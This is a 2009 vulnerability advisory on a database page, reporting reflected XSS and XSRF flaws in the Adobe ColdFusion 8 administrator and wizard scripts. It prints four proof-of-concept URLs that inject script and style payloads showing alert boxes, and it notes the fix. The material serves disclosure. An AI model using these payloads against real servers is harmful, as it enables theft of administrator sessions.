Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22332
HistoryAug 17, 2009 - 12:00 a.m.

[DSECRG-09-022] Adobe Coldfusion 8 Multiple Linked XSS Vulnerabilies

2009-08-1700:00:00
vulners.com
20
JSON

http://www.dsecrg.com/pages/vul/show.php?id=122

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-022

Application: Adobe Coldfusion 8
Versions Affected: Adobe Coldfusion 8
Vendor URL: http://adobe.com
Bugs: Multiple Linked XSS,XSRF
Exploits: YES
Reported: 12.01.2009
Vendor response: 13.01.2009
Date of Public Advisory: 17.08.2009
CVE-number: CVE-2009-1872
Author: Alexander Polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description

Multiple Linked XSS and XSRF vulnerabilities found in Adobe Coldfusion Server 8. Attacker can create evil link and steal administrators cookie

Details

  1. Multiple Linked XSS vulnerabilities found in Adobe Coldfusion Server 8.

1.1 Linked XSS vulnerability found in script searchlog.cfm. vulnerable parameter startRow

Example

http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E

1.2 Linked XSS vulnerability found in script _logintowizard.cfm. Attacker can inject XSS in url string

Example

http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"><script>alert('DSECRG_XSS')</script>

1.3 Linked XSS vulnerability found in script _authenticatewizarduser.cfm. Attacker can inject XSS in url string

Example

http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"><script>alert('DSECRG_XSS')</script>

1.4 Linked XSS vulnerability found in script _authenticatewizarduser.cfm.Attacker can inject XSS in url string

Example

http://localhost:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('DSECRG_XSS')</script>

Fix Information

The issue has been solved 17 august 2009. http://www.adobe.com/go/apsb09-12

References:

http://www.adobe.com/go/apsb09-12
http://www.dsecrg.com/pages/vul/show.php?id=122

About

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

–
Π‘ ΡƒΠ²Π°ΠΆΠ΅Π½ΠΈΠ΅ΠΌ,
research mailto:[email protected]

Related

prion 1
cve 1
packetstorm 1
checkpoint_advisories 1
securityvulns 1
nuclei 1
nessus 1
prion
prion
Cross site scripting
2009-08-18 22:30:00
cve
cve
CVE-2009-1872
2009-08-18 22:30:00
packetstorm
packetstorm
Adobe Coldfusion 8 XSS / XSRF
2009-08-17 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Server Cross-Site Request Forgery (APSB09-12; CVE-2009-1872)
2009-09-14 00:00:00
securityvulns
securityvulns
Adobe Coldfusion crossite scripting
2009-08-17 00:00:00
nuclei
nuclei
Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
2021-07-21 06:05:30
nessus
nessus
Adobe ColdFusion <= 8.0.1 _logintowizard.cfm XSS
2009-11-02 00:00:00
JSON
Related for SECURITYVULNS:DOC:22332
prion1cve1packetstorm1checkpoint_advisories1securityvulns1nuclei1nessus1